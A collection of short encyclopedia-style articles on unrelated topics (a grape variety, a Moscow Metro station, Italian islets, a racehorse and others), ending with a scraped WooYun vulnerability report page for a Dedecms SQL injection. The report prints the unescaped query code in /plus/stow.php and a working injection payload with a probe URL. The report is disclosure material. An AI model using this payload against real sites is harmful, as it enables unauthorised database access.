In Austria, where it was grown on as of 1999, Bouvier is used primarily for Sturm—a seasonally produced semi-fermented grape must—and young-bottled wines. In Germany, Bouvier was cultivated on as of 2004.
Bouvier ripens very early, is resistant to frost, and gives a rather low yield. Its wines are golden yellow, mild in taste and have a Muscat aroma.
History and pedigree
Winery owner Clotar Bouvier (1853–1930) discovered a vine of this variety in his vineyard in Herzogburg, Ober-Radkersburg (in present-day Slovenia) in the year 1900. He used this vine as a basis for breeding and, after several years of selection, started to sell it, after which it became widely spread across Austria-Hungary. DNA profiling has revealed Bouvier to be a crossing (probably a natural one) of a Pinot variety (which could be Pinot noir, Pinot gris or Pinot blanc) and another, unidentified variety, possibly Muscat à Petits Grains according to the Vitis International Variety Catalogue.
In 1963 at the Kölyuktetö viticultural research facility in Eger, viticulturists László Bereznai and József Csizmazia crossed Bouvier with Eger 2 (a selfling of Villard blanc) to produce the Hungarian wine grape Bianca.
Synonyms
Bouvier is also known under the synonyms Bela Ranina, Bela Ranka, Boouvierovo Grozno, Bouvier blanc, Bouvier Précoce, Bouvier Trante weisse, Bouvier Traube weisse, Bouvierov Hrozen, Bouvierova Ranina, Bouvierovo Grozno, Bouvierovo Hrozno, Bouvierovo Ranina, Bouvierrebe, Bouviertraube, Bouviertraube weisse, Bouvieruv Hrozen, Bouvijejeva Ranka, Bouvijeorva Ranina, Bouvijerova Ranka, Bovije, Buveleova Ranka, Buvie, Buvierov Hrozen, Buvije, Buvijeova Ranina, Buvijeova Ranka, Buvijeva Ranka, Buvileova Ranka, Chasselas Bouvier, Findling, Kimmig Kp 1, Précoce de Bouvier, Précoce de Bouvier bianco, Précoce de Bouvier blanc, Précoce di Bouvier bianco, Radgonska Ranina, Radgonska Ranina bijela, Ragdonska Ranina bela, Ranina, Ranina bela, Ranka, and Sasla Buvije.
References
White wine grape varieties
Table grape varieties
Hungarian wine
Austrian wine
Slovak wine
Slovenian wine |
Vystavochnaya () is a station on the Filyovskaya Line of the Moscow Metro. It was opened on 10 September 2005, and was called Delovoy Tsentr (, "Business Centre") before 1 June 2009.
The high-tech design, which was the work of architects Aleksandr Vigdorov, Leonid Borzenkov, and Olga Farstova, is a radical departure from previous Metro stations.
The station is built on two levels, with the platform on the lower level. The upper level consists of two walkways which span the length of the platform. One walkway, the larger one, is enclosed in glass and sweeps from one side of the station to the other and back in a large arc. The other walkway is open and straight, running directly above the inbound track. The D-shaped area between the two walkways extends to the full height of the station. The two rows of pillars span both levels and are clad in stainless steel. The walls are faced with white plastic panels and brown marble, and Alucobond was used for the ceiling.
The entrance to the station is built into the lower level of Moscow International Business Center (Moscow-City), near the north bank of the Moskva River, also serving access to Moscow Expocenter.
In the upper level of the station before you go through the turn styles can be found the public museum to the Moscow Metro. It is free to enter and has photos and displays of memorabilia and artwork spanning the ages. There is also a train cab simulator.
Transfer
Passengers at Vystavochnaya are able to transfer to Delovoy Tsentr of the Kalininsko–Solntsevskaya line. A third station, that allow transfers to the Bolshaya Koltsevaya line.
Gallery
References
Moscow Metro stations
Railway stations in Russia opened in 2005
Moscow International Business Center
Filyovskaya Line
Railway stations located underground in Russia |
The Formiche di Grosseto ("Ants of Grosseto") is a group of islets which emerge sharply in the Tuscan Archipelago. They are located in open sea among the coast of the Natural Park of Maremma and Pianosa, approximately from Porto Santo Stefano on Monte Argentario and from Marina di Grosseto; they are part of the comune of Grosseto and are placed in a nature reserve which makes part of a special protection area.
Description
The Formiche di Grosseto are three islets named, according to their dimensions, Formichino, Formica Media and Formica Grande which develop a total surface of about 120,000 square metres which extend lined up from north-west to south-east over one mile. Formichino is the smallest and is formed by two skerries, is the southernmost and has an area of only 20 square metres. Formica Media is a long narrow strip of rock that continues under water situated on a shoal. Formica Grande is the largest, has a rhomboidal shape, it is 370 metres long and 230 metres wide, is the northernmost and home the Scoglio Formiche di Grosseto lighthouse. The island has three old docking points on three different sides to permit the mooring depending on the wind and is equipped with a helipad utilized for the maintenance of the lighthouse.
Flora and fauna
The Formiche di Grosseto is a place enjoyed by scuba divers for the richness of its waters. The seabed is prosperous in sponges, gorgoniidae, sabella spallanzanii and in fishes as grouper, sarago, conger, muraena, astice and lobster.
See also
List of islands of Italy
Scoglio Formiche di Grosseto Lighthouse
Gallery
References
Islands of Tuscany
Province of Grosseto |
Used By You may refer to:
"Used By You", a 2013 song by Marcus Canty from This...Is Marcus Canty
"Used By You", a 2015 song by Metro Station from Savior |
Arta bichordalis is a species of snout moth in the genus Arta. It was described by Émile Louis Ragonot, in 1891, and is known from Brazil.
References
Chrysauginae
Moths of South America
Pyralidae of South America
Moths described in 1891 |
The 1903 South Carolina United States Senate election, held January 27, 1903 to select the U.S. senator from the state of South Carolina, was predetermined by the Democratic Party primary election held on August 26, 1902, and September 9. Democrats were so overwhelmingly dominant that their nomination was tantamount to the general election.
Prior to the ratification of the 17th Amendment to the United States Constitution, U.S. senators were elected by the state legislature and not through the direct election by the people of the state. However, the Democratic Party of South Carolina organized primary elections for the U.S. Senate beginning in 1896 and the General Assembly would confirm the choice of the Democratic voters. Tillmanite Democrat Asbury Latimer won the Democratic primary and was elected by the General Assembly for a six-year term.
Democratic primary
Candidates
William Elliott, U.S. Representative from Beaufort
John Gary Evans, former Governor of South Carolina
John J. Hemphill, former U.S. Representative from Chester
Dan S. Henderson
George Johnstone, former U.S. Representative from Newberry County
Asbury Latimer, U.S. Representative from Belton
Campaign
In the special election of 1897, the Conservatives were without a candidate so in 1902 four candidates vied for the support of Conservatives: Dan S. Henderson, William Elliott, George Johnstone and John J. Hemphill. The two remaining candidates in the race, Representative Asbury Latimer and former Governor John Gary Evans, were strong Tillmanites. However, they held strongly opposing views and a duel almost ensued between the two while campaigning at St. George on July 12. A fight did indeed break out between Latimer and Hemphill when they were campaigning in Gaffney on August 14. Latimer took offence to an accusation by Hemphill and struck him. Hemphill was unable to strike back because Latimer quickly left the scene.
On August 26, Latimer and Evans emerged as the top two candidates in the field and were to face each other in a runoff election on September 9. The Conservative candidates had garnered more votes combined than the combined vote of Latimer and Evans, but their inability to coalesce around a single candidate prevented a Conservative from winning the election. Evans was widely disliked by Conservatives in the state so they threw their support behind Latimer and he easily won the runoff election.
Results
See also
List of United States senators from South Carolina
1902 and 1903 United States Senate elections
1902 United States House of Representatives elections in South Carolina
1902 South Carolina gubernatorial election
References
Senate
1903
South Carolina |
Jhirniya is a village in the Bhopal district of Madhya Pradesh, India. It is located in the Berasia tehsil.
Demographics
According to the 2011 census of India, Jhirniya has 197 households. The effective literacy rate (i.e. the literacy rate of population excluding children aged 6 and below) is 59.3%.
References
Villages in Berasia tehsil |
William Elwood Sterling (February 7, 1927 - June 28, 2005) was an American Episcopalian bishop who served as the 6th suffragan bishop of the Episcopal Diocese of Texas from September 1989 to February 1999.
Early life and education
Sterling was born on February 7, 1927, in Houston, Texas, to Norman Sterling and Mabel Hewitt. Both of his parents died in their hundreds, his father at the age of 102, and his mother at the age of 104. He was educated at the San Jacinto High School in Houston, after which he served in the US Navy during World War II. After the war he resumed his education and studied at the University of Houston and graduating in 1949 with a Bachelor of Arts in management. He then worked as a Bank teller at the Houston Branch of the Federal Reserve Bank of Dallas and later as a safety engineer and payroll auditor for the American Surety Company of Houston. After some time he was employed as a manufacturer's representative of hotel and restaurant supplies by Raleigh W. Johnson Company. Sterling left the world of business and enrolled in a theology course at the Seminary of the Southwest from where he graduated in 1957.
Ordained ministry
Sterling was ordained deacon on June 18, 1957, and priest on June 19, 1958, by Suffragan Bishop James Clements of Texas. He initially was in charge of St Mark's Church in Rosenberg, Texas, and Grace Church in Houston. Between 1960 and 1966, he was rector of St Paul's Church in Freeport, Texas, while from 1966 until 1977, he served as vicar of Church of the Good Shepherd in Friendswood, Texas. In 1977, Good Shepherd became a parish church and he thus became its first rector, a position he held until 1989. He also held a number of diocesan positions.
Bishop
On May 5, 1989, Sterling was elected Suffragan Bishop of Texas on the seventh ballot and was consecrated on September 9, 1989, by Presiding Bishop Edmond L. Browning. He remained in office until his retirement in February 1999. He then became Bishop-in-Residence at Trinity Church in Houston, and served there until his death on June 28, 2005, as a result of cancer.
References
1927 births
2005 deaths
20th-century American Episcopalians
Episcopal bishops of Texas
20th-century American clergy
University of Houston alumni
Seminary of the Southwest alumni |
Pachyderm Recording Studio is a residential music recording studio located in Cannon Falls, Minnesota, United States, 35.8 mi (57.6 km) southeast of Minneapolis–Saint Paul International Airport. It is located in a secluded old-growth forest in rural Minnesota.
The studio was founded in 1988 by Jim Nickel, Mark Walk and Eric S. Anderson, with acoustic design by Bret Theney of Westlake Audio. It boasted the same Neve 8068 recording console that was used in Jimi Hendrix's Electric Lady Studios as well as Studer tape machines. The house was designed by Herb Bloomberg, architect of Old Log Theatre and founder of the Chanhassen Dinner Theatres.
The studio went into a decline in the mid-2000s, after original co-owner Jim Nickel sold the property. It went into a state of disrepair for many years, though bands occasionally still recorded there. It was purchased by engineer John Kuker in 2011 out of foreclosure and remodeled over the next three years. Kuker died on February 2, 2015, at the age of 40.
The studio is currently operational; the home, studio and grounds have been renovated. Musicians are able to use and record with the wide variety of musical equipment and guitars that Kuker collected.
Selected recordings made at Pachyderm
Seamonsters – The Wedding Present (1991)
Fontanelle – Babes In Toyland (1992)
Hollywood Town Hall – The Jayhawks (1992)
Grave Dancers Union – Soul Asylum (1992)
In Utero – Nirvana (1993)
Sound as Ever – You Am I (1993)
Rid of Me – PJ Harvey (1993)
Throwing Copper – Live (1994)
Arise Therefore – Palace (1996)
Rapture – Bradley Joseph (1997)
Good News for Modern Man – Grant Hart (1999)
From Here to Infirmary – Alkaline Trio (2001)
Stuart Davis – Stuart Davis (2001)
The End of All Things to Come – Mudvayne (2002)
Armchair Apocrypha – Andrew Bird (2007)
Prog – The Bad Plus (2007)
Wild Animals – Trampled by Turtles (2014)
Panic Stations – Motion City Soundtrack (2015)
The Cooling – Reina del Cid (2015)
Polar Similar – Norma Jean (2016)
Furnace – Dead Man Winter (2017)
Still Thirsty – Four Pints Shy (2018)
Life Is Good on the Open Road – Trampled by Turtles (2018)
Sigourney Fever – Trampled by Turtles (2019)
Red Tail – Dave Simonett (2020)
Once Twice Melody – Beach House (2022)
Caves – NEEDTOBREATHE (2023)
References
External links
Live Nirvana Sessions History: In Utero
Pachyderm Studio's old website - archived version of the studio's pre-2009 website
Pachyderm Studio's words from clients - a list of experiences by artists who have recorded at Pachyderm Studios
Buildings and structures in Goodhue County, Minnesota
Music venues in Minnesota
Recording studios in the United States
1988 establishments in Minnesota |
The V Corps, also known as Victory Corps, is a field corps of Pakistan Army assigned in Karachi, Sindh province of Pakistan. The V Corps is the only corps that is stationed in the Sindh Province. It is headquartered in Karachi. Currently, the corps is commanded by Lieutenant-General Babar Iftikhar (Since December 2022).
History
The Corps was raised in 1975 to command Pakistani units in the entire of Sindh and some parts of southern Punjab and eastern Balochistan. The corps was heavily used in the Sindh anti-dacoity operations in the rural Sindh and the anti-terrorism operations in the urban Sindh during the late 1980s and the early 1990s. The Corps played an important role in 1999 coup d'état led by Chief of Army Staff and Chairman of Joint Chief of Staff Committee General Pervez Musharraf. The coup removed the democratically elected government of Prime minister Nawaz Sharif in 1999.
The corps took part in assisting the federal government in preparing for Cyclone Biparjoy. The 18th Infantry Division was involved in establishing relief camps and evacuating people living near the coastline.
Structure
List of corps commanders
See also
XI Corps (Pakistan)
I Corps (Pakistan)
Structure of the Pakistan Army
References
External links
Global Security Website about the V Corps
This shows the Formations Insignia
5
Military units and formations established in 1975 |
Ourémai is a town and sub-prefecture in the Macenta Prefecture in the Nzérékoré Region of south-eastern Guinea.
References
Sub-prefectures of the Nzérékoré Region |
A big cheese is a boss or other senior person, particularly in an organization.
Big Cheese or The Big Cheese may also refer to:
Arts and Entertainment
Music
Big Cheese (band), an English straight edge hardcore punk band
"Big Cheese", a song by American rock band Bayside from their 2014 album, Cult
“Big Cheese”, a song by American rock band Nirvana from their 1989 album, Bleach
Television
"The Big Cheese", an episode of animated series Camp Lazlo
"The Big Cheese", an episode of animated series Dexter's Laboratory
"The Big Cheese" (Foster's Home for Imaginary Friends), a 2006 episode of animated series Foster's Home for Imaginary Friends
"The Big Cheese", an episode of animated series Maggie and the Ferocious Beast
Other
Big Cheese (magazine), an independent music magazine published in the United Kingdom
Bodalla Big Cheese, a visitor attraction in Bodalla, New South Wales
Big Cheese, the prime minister of Little Tokyo in the anime Samurai Pizza Cats
See also
Cheese (disambiguation) |
Holy Roller (foaled 18 November 1992) was an Australian Thoroughbred racehorse of the mid-to late 1990s. He won 12 of his 25 races and a developed a cult following amongst Sydney race fans. Bred and owned by Woodlands Stud, Holy Roller stood 18.1 hands, compared to the average thoroughbred at around 16 hands. His career highlights included wins in the Bill Ritchie Handicap and the Crystal Mile.
Holy Roller was born at Woodlands Stud Denman, New South Wales, where it took his dam over one hour give birth. The foal arrived at 02:40, yet did not stand until 03:20. Both dam and foal were exhausted and lay for almost an hour recovering. When the foal finally stood, he reached the mid-chest level of a 6 foot watchman.
His dam, Secret Blessing, was an average sized mare, standing at about 16 hands, but very wide and roomy. Most of her progeny had been fairly large- her daughters tended to be wide like her, such as Genuflect, but her daughter (aptly named 'Immense') was tall and wide, but not as big as her half-brother Holy Roller. His sire, Sanction, was a fairly tall horse who stood at about 16.1 hands.
Holy Roller was weaned off his dam in April 1993. He was always very easy to pick out amongst the weanlings in a paddock- he was taller than the Clydesdale foal that shared the paddock.
Woodlands Stud does not sell its yearlings, but races everything it breeds; Trevor Lobb (general manager) and their private trainer, John Hawkes, assess the youngsters in November and divides them into the appropriate groups for breaking-in. When John Hawkes saw Holy Roller the first time, he said, "He would look good pulling a cart." The yearling was shared a name with the evangelical preachers who used to roam the southern states of the United States, commonly known as "holy rollers". He was left until the very last batch of yearlings for breaking-in and didn't go to Belmont Park until May 1994. After the breaker rode him the first time, he said, "This huge lump knows where he is putting his feet and has tremendous balance." Holy Roller was gelded at an early age to try to slow down his rapid growth pattern, but it didn't work.
Holy Roller didn't start racing until he was a late 3 year old. He then won at Canterbury and Moonee Valley, which were both very tight-turning tracks. He always had to race on the outside of the field to have the freedom to stretch out properly. If caught inside other horses, he would cramp up to avoid hitting the others.
At breaking-in, Holy Roller measured 17 hands and weighed an estimated 660 kg. After his fourth start, he was sent away to further mature and grow. Upon his return he measured 18.1 hands.
Jockeys who have ridden Holy Roller him say it was like riding in an old Cadillac, very smooth ride, tremendous suspension but when the stride lengthens in the straight, they get whiplash in their necks; they also refuse to dismount straight off his back but rather get down onto a handy rail if possible, then drop to the ground. Another problem during a race was that the jockey was often unable to see horses in front of Holy Roller's neck and head (hidden underneath), and would have to trust to the horse to get around and past the smaller horse safely. Jockey Larry Cassidy said often he would ask Holy Roller to go forward in a race but the horse would refuse, then move out sideways, and Larry would realize there had been a "normal size" horse in front of him but not visible from the saddle.
Holy Roller created extra work for farriers. Standard steel shoes are about 8 inches in length but the Holy Roller needed 14 inches per hoof, meaning the farrier had to start with a straight steel bar.
Upon his retirement, his owners - "Chicken Kings" Jack and Bob Ingham - donated Holy Roller to Rod Hoare (NSW State Equine Veterinary Officer) who was looking for a big horse to compete at dressage and eventing.
References
Holy Roller's pedigree and partial racing stats
1992 racehorse births
Thoroughbred family 16-a
Racehorses bred in Australia
Racehorses trained in Australia |
Akam (English: Inside) is an Indian Malayalam language thriller drama film written and directed by Shalini Usha Nair. The film is a contemporary retelling of Malayattoor Ramakrishnan's classic psycho-thriller novel Yakshi (1967). The story is about Srini (Fahadh Faasil), a young architect, who starts suspecting that his beautiful wife Ragini (Anumol) is a yakshi.
The film was shot in and around Trivandrum and its surrounding suburbs. It premiered at the 8th Dubai International Film Festival in December 2011. It was also screened at the Shanghai International Film Festival and International Film Festival of Kerala. The film released in theatres on 26 April 2013.
Plot
Srinivasan is a young architect. He is happy when he gets a good job and a beautiful girlfriend, Tara. But then an accident disfigures him. Tara leaves him and Srinivasan, now sans his confidence, withdraws into his shell. Then he meets the beautiful Ragini who is willing to accept him despite his disfigurement. They get married, but after a while, he doubts the true identity of this woman. He doubts that this woman is not human. From there the story develops.
Cast
Fahadh Faasil as Srini
Anumol as Ragini
Prakash Bare
Shelly Kishore
Sajitha Madathil
Critical reception
Veeyen from Nowrunning.com says: "Somber and extremely suspenseful, the illusory texture of its narrative turns out to be of a class of its own."
Film festival screenings
The film was screened at the following festivals:
December 2011: Dubai International Film Festival
December 2011: International Film Festival of Kerala
June 2012: Shanghai International Film Festival (World Panorama section)
See also
Yakshi, a 1968 film adaptation of the novel
References
External links
Lure of the enigma (Khaleej Times)
2011 films
2010s Malayalam-language films
2011 psychological thriller films
Indian psychological thriller films
Films based on thriller novels
Films based on Indian novels
Works by Malayattoor Ramakrishnan
Films shot in Thiruvananthapuram |
Frank A. King was an American football coach. He served as the head football coach at the University of Arizona for one season in 1913, compiling a record of 2–2.
Head coaching record
References
Year of birth missing
Year of death missing
Arizona Wildcats football coaches |
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\/>","NUMBER":"\u7684\u6b63\u6574\u6570","RATING_SUCCESS":"\u8bc4\u5206\u6210\u529f","RATING_BUGS_DONE":"\u5df2\u5bf9\u6b64\u6f0f\u6d1e\u8fdb\u884c\u8fc7\u8bc4\u5206","RATING_BUGS_SELF":"\u4e0d\u80fd\u5bf9\u81ea\u5df1\u53d1\u5e03\u7684\u6f0f\u6d1e\u8fdb\u884c\u8bc4\u5206","RATING_SUBMIT_CANCLE":"\u53d6\u6d88\u63d0\u4ea4\u8bc4\u5206","RATING_SUBMIT":"\u63d0\u4ea4\u6211\u7684\u8bc4\u5206","RATING_SUBMIT_CHECK":"\u8bf7\u786e\u5b9a\u6bcf\u4e00\u9879\u90fd\u9009\u62e9\u4e86\u8bc4\u5206","RATING_CONFIRM":"\u786e\u5b9a\u63d0\u4ea4\u5bf9\u6b64\u5382\u5546\u7684\u8bc4\u5206\u5417\uff1f","RATING_LOGIN":"\u53ea\u6709\u767b\u5f55\u7684\u767d\u5e3d\u5b50\u624d\u80fd\u8bc4\u5206","RATING_DONE":"\u5df2\u7ecf\u8bc4\u8fc7\u5206\u4e86","WOOYUN_CORPS":"\u4e4c\u4e91\u5382\u5546","MARST_IMAGE":"\u5bf9\u56fe\u7247\u6253\u7801","FEEDBACK_LINK_NULL":"\u94fe\u63a5\u4e0d\u80fd\u4e3a\u7a7a\uff01","FEEDBACK_LINK_ERROR":"\u8bf7\u4e66\u5199\u6b63\u786e\u7684\u94fe\u63a5\u5730\u5740\uff01","FEEDBACK_CONTENT_NULL":"\u95ee\u9898\u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a\uff01","FEEDBACK_ALLOW_LIMIT":"\u534a\u5c0f\u65f6\u53ea\u5141\u8bb8\u53cd\u9988\u4e00\u6b21","TOP_RANK":"\u6392\u540d","TOP_BUG_TITLE":"\u6f0f\u6d1e\u6807\u9898","TOP_RANK_NONE":"\u6682\u65e0\u6392\u540d","TOP_BUGS_GOOD":"\u4f18\u8d28\u6f0f\u6d1e\u6570","NICKNAME":"\u6635\u79f0","LEVEL":"\u7b49\u7ea7","VALUE":"\u503c","EDITOR_INSERT_PIC":"\u63d2\u5165\u56fe\u7247","EDITOR_PIC_ADDR":"\u5730\u5740\uff1a","EDITOR_CONFIRM":"\u786e\u5b9a","EDITOR_PIC_NULL":"\u8bf7\u4e0a\u4f20\u56fe\u7247\u6216\u586b\u5199\u56fe\u7247\u5730\u5740","EDITOR_INSERT_VIDIO":"\u63d2\u5165\u89c6\u9891","EDITOR_VIDIO_ADDR":"\u89c6\u9891\u5730\u5740\uff1a","EDITOR_VIDIO_NULL":"\u8bf7\u586b\u5199\u89c6\u9891\u5730\u5740(.swf)","EDITOR_VIDIO_TYPE":"\u76ee\u524d\u4ec5\u652f\u6301.swf\u683c\u5f0f","PIC_SELECT":"\u8bf7\u9009\u62e9\u5f85\u4e0a\u4f20\u7684\u56fe\u7247","PIC_TYPE_IS":"\u56fe\u7247\u7c7b\u578b\u4e3a","UPLOAD":"\u4e0a\u4f20","RANK_AVG":"\u6f0f\u6d1e\u5e73\u5747"};
$(function(){
function getParamsOfShareWindow(width, height) {
return ['toolbar=0,status=0,resizable=1,width=' + width + ',height=' + height + ',left=',(screen.width-width)/2,',top=',(screen.height-height)/2].join('');
}
});
function errimg(img){
tmp=img.src;
nimg=tmp.replace("path_to_url","path_to_url");
img.src=nimg;
$(img).parent().attr('href',nimg);
img.onerror=null;
}
function AttendBug(id){
$.get('/ajaxdo.php',{module:'attendbug',id:id,rid:Math.random(),token:$("#token").val()},function(re){
if(re==1){
$("#attention_num").html(parseInt($("#attention_num").html())+1);
$("#attend_action").html(''+_LANGJS.ATTENTION_DONE+' <a class="btn" href="javascript:void(0)" onclick="AttendCancel('+id+')">'+_LANGJS.ATTENTION_CANCEL+'</a></span>');
}else if(re==2){
alert(_LANGJS.LOGIN_FIRST);
}else if(re==3){
alert(_LANGJS.ATTENTION_BUG_DONE);
}else{
alert(_LANGJS.FAIL_MANAGE);
}
});
}
function AttendCancel(id){
if(confirm(_LANGJS.ATTENTION_BUG_CONFIRM+"?")){
$.get('/ajaxdo.php',{module:'attendcancel',id:id,rid:Math.random(),token:$("#token").val()},function(re){
if(re==1){
$("#attention_num").html(parseInt($("#attention_num").html())-1);
$("#attend_action").html('<a class="btn" href="javascript:void(0)" onclick="AttendBug('+id+')">'+_LANGJS.ATTENTION_BUG+'</a></span>');
}else{
alert(_LANGJS.FAIL_MANAGE);
}
});
}
}
function CollectBug(id,token){
$.get('/ajaxdo.php',{'module':'collect','id':id,'token':token,'rid':Math.random()},function(re){
if(re==1){
$("#collection_num").html(parseInt($("#collection_num").html())+1);
$(".btn-fav").removeClass("fav-add");
$(".btn-fav").addClass("fav-cancel");
$(".btn-fav").unbind();
$(".btn-fav").click(function(){
CollectCancel(id,token);
});
}else if(re==2){
alert(_LANGJS.LOGIN_FIRST);
}else if(re==3){
alert(_LANGJS.COLLECTION_BUG_DONE);
}else{
alert(_LANGJS.FAIL_MANAGE);
}
});
}
function CollectCancel(id,token){
if(confirm(_LANGJS.COLLECTION_BUG_CONFIRM+"?")){
$.get('/ajaxdo.php',{'module':'collectcancel','id':id,'token':token,'rid':Math.random()},function(re){
if(re==1){
$("#collection_num").html(parseInt($("#collection_num").html())-1);
$(".btn-fav").removeClass("fav-cancel");
$(".btn-fav").addClass("fav-add");
$(".btn-fav").unbind();
$(".btn-fav").click(function(){
CollectBug(id,token);
});
}else{
alert(_LANGJS.FAIL_MANAGE);
}
});
}
}
</script>
<div class="content">
<input type="hidden" id="token" style="display:none" value="" />
<h2>
<span style="margin:0 0 0 580px; float:right; position:absolute; font-size:14px; font-weight:normal">(<span id="attention_num">13</span>)
<span id="attend_action">
<a class="btn" href="javascript:void(0)" onclick="AttendBug(48913)"></a></span>
</span></h2>
<h3> <a href="wooyun-2014-048913">WooYun-2014-48913</a>
<input id="fbid" type="hidden" value="48913">
</h3>
<h3 class='wybug_title'> Dedecms 8() <img src="path_to_url" alt="" class="credit">
</h3>
<h3 class='wybug_corp'> <a href="path_to_url">
Dedecms </a>
</h3>
<h3 class='wybug_author'> <a href="path_to_url">Matt</a><img height="12" width="12" style="vertical-align:-2px;margin-left:2px;" src="path_to_url" alt="" /></h3>
<h3 class='wybug_date'> 2014-01-14 18:25</h3>
<h3 class='wybug_open_date'> 2014-04-14 18:26</h3>
<h3 class='wybug_type'> SQL</h3>
<h3 class='wybug_level'> </h3>
<h3>Rank 20</h3>
<h3 class='wybug_status'>
</h3>
<h3> <a href="path_to_url">path_to_url help@wooyun.org</h3>
<h3>Tags
</h3>
<h3>
<!-- Baidu Button BEGIN -->
<div id="share">
<div style="float:right; margin-right:100px;font-size:12px">
<span class="fav-num"><a id="collection_num">1</a></span>
<a style="text-decoration:none; font-size:12px" href="javascript:void(0)" class="fav-add btn-fav"></a>
<script type="text/javascript">
var token="";
var id="48913";
$(".btn-fav").click(function(){ CollectBug(id,token); });
</script>
</div>
<span style="float:left;"></span>
<div id="bdshare" class="bdshare_b" style="line-height: 12px;"><img src="path_to_url" />
<a class="shareCount"></a>
</div>
</div>
<!-- Baidu Button END -->
</h3>
<hr align="center"/>
<h2></h2>
<h3 class="detailTitle"></h3>
<p class="detail" style="padding-bottom:0">
</p>
<p class="detail wybug_open_status">
2014-01-14 <br/>
2014-01-14 <br/>
2014-01-17 <a href="path_to_url" target="_blank"></a><a href="path_to_url" target="_blank"></a><a href="path_to_url" target="_blank"></a><br/>
2014-03-10 <br/>
2014-03-20 <br/>
2014-03-30 <br/>
2014-04-14 <br/>
</p>
<h3 class="detailTitle"></h3>
<p class="detail wybug_description">Dedecms 8()<br />
<br />
</p>
<h3 class="detailTitle"></h3>
<div class='wybug_detail'>
<p class="detail"></p><fieldset class='fieldset fieldset-code'><legend>code </legend><pre><code>/plus/stow.php<br />
if($type=='')<br />
{<br />
$row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE aid='$aid' <br />
<br />
AND mid='{$ml->M_ID}'");<br />
if(!is_array($row))<br />
{<br />
$dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`<br />
<br />
(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes<br />
<br />
($arctitle)."','$addtime'); ");<br />
} else {<br />
ShowMsg('<br />
<br />
','javascript:window.close();');<br />
exit();<br />
}<br />
} else {<br />
$row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE <br />
<br />
type='$type' AND (aid='$aid' AND mid='{$ml->M_ID}')");<br />
if(!is_array($row))<br />
{<br />
$dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`<br />
<br />
(mid,aid,title,addtime,type) VALUES ('".$ml-<br />
<br />
>M_ID."','$aid','$title','$addtime','$type'); ");//TITLE<br />
<br />
<br />
}</code></pre></fieldset><p class='detail'> </p>
</div>
<h3 class="detailTitle"></h3>
<div class='wybug_poc'>
<p class="detail">soeasy <br />
<br />
**.**.**.**/dede/member/content_list.php?channelid=1 <br />
<br />
1111',1,2),(8,136,user(),1,2),(1,2,'3<br />
<br />
<br />
<br />
<br />
<br />
ID<br />
<br />
**.**.**.**/dede/plus/stow.php?aid=137&type=11%27 <br />
<br />
137ID<br />
<br />
</p><p class="detail usemasaic"><a href="../upload/201401/14182236cb067ecb3f3fd5fc6b7dd1f4a494bca7.png" target="_blank"><img src="../upload/201401/14182236cb067ecb3f3fd5fc6b7dd1f4a494bca7.png" alt="QQ20140114181557.png" width="600" onerror="javascript:errimg(this);"/></a></p><p class="detail"></p><p class="detail usemasaic"><a href="../upload/201401/14182244432d1041d0ac6c75bd53583cbc2cd96f.png" target="_blank"><img src="../upload/201401/14182244432d1041d0ac6c75bd53583cbc2cd96f.png" alt="3.png" width="600" onerror="javascript:errimg(this);"/></a></p><p class="detail"></p><p class="detail usemasaic"><a href="../upload/201401/141823009a981167eb1db812b450e76b94c2eed8.png" target="_blank"><img src="../upload/201401/141823009a981167eb1db812b450e76b94c2eed8.png" alt="2.png" width="600" onerror="javascript:errimg(this);"/></a></p><p class="detail"><br />
<br />
</p><p class="detail usemasaic"><a href="../upload/201401/1418233608f553838217e3da757a16ce274ce566.png" target="_blank"><img src="../upload/201401/1418233608f553838217e3da757a16ce274ce566.png" alt="5.png" width="600" onerror="javascript:errimg(this);"/></a></p><p class="detail"> </p>
</div>
<h3 class="detailTitle"></h3>
<div class='wybug_patch'>
<p class="detail"> </p>
</div>
<h3 class="detailTitle"> <a style="font-weight:normal" href="path_to_url" title="Matt">Matt</a>@<a style="font-weight:normal" href="path_to_url" title="Dedecms 8()"></a></h3>
<hr align="center"/>
<h2 id="bugreply"></h2>
<div class='bug_result'>
<h3 class="detailTitle"></h3>
<p class="detail"></p>
<p class="detail">Rank6 </p>
<p class="detail">2014-01-14 22:24</p>
<h3 class="detailTitle"></h3>
<p class="detail"></p>
<h3 class="detailTitle"></h3>
<p class="detail"></p>
</div>
<hr align="center" />
<script type="text/javascript">
var bugid="48913";
var bugRating="-3";
var myRating="";
var ratingCount="0";
function ShowBugRating(k){
var ratingItems=$(".myrating span");
$.each(ratingItems,function(i,n){
var nk=parseInt($(n).attr("rel"));
if(nk<=k){
$(n).addClass("on");
}else{
$(n).removeClass("on");
}
});
$(".myrating span").hover(
function(){
$("#ratingShow").html($(this).attr("data-title"));
},
function(){
$("#ratingShow").html("");
}
);
}
$(document).ready(function(){
if(myRating==""){
var ratingItems=$(".myrating span");
$(".myrating span").hover(
function(){
$(this).addClass("hover");
var k=parseInt($(this).attr("rel"));
$.each(ratingItems,function(i,n){
var nk=parseInt($(n).attr("rel"));
if(nk<k) $(n).addClass("on");
if(nk>k) $(n).removeClass("on");
});
$("#ratingShow").html($(this).attr("data-title"));
},
function(){
$(this).removeClass("hover");
if($("#myRating").val()==""){
$.each(ratingItems,function(i,n){
$(n).removeClass("on");
});
}
$("#ratingShow").html("");
}
);
$(".myrating span").click(function(){
var rating=$(this).attr("rel");
var k=parseInt($(this).attr("rel"));
$.post("/ajaxdo.php?module=bugrating",{"id":bugid,"rating":rating,"token":$("#token").val()},function(re){
//
$(".myrating span").unbind();
re=parseInt(re);
switch(re){
case 1:
$("#ratingShow").html(_LANGJS.RATING_SUCCESS);
$("#ratingSpan").html(parseInt($("#ratingSpan").html())+1);
$.each(ratingItems,function(i,n){
var nk=parseInt($(n).attr("rel"));
if(nk<=k){
$(n).addClass("on");
}else{
$(n).removeClass("on");
}
});
ShowBugRating(rating);
break;
case 2:
$("#ratingShow").html(_LANGJS.LOGIN_FIRST);
break;
case 4:
$("#ratingShow").html(_LANGJS.RATING_BUGS_DONE);
break;
case 6:
$("#ratingShow").html(_LANGJS.RATING_BUGS_SELF);
break;
default:break;
}
});
});
}else{
if(ratingCount>2){
ShowBugRating(bugRating);
}else{
ShowBugRating(-3);
}
}
});
</script>
